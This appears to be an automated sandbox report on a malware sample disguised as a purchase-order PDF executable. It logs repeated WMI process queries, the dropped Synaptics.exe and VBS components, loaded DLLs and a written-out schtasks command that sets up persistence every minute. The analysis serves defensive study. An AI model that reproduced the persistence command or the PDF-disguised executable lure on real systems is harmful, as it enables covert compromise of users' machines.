                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: New PO - Supplier 16-12-2024-Pdf.exeVirustotal: Detection: 80%
                              Source: New PO - Supplier 16-12-2024-Pdf.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile read: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe "C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe"
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeProcess created: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe "C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe"
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                              Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 8704
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeProcess created: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe "C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbsJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1Jump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: shacct.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: idstore.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: twinapi.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wlidprov.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: provsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: apphelp.dllJump to behavior
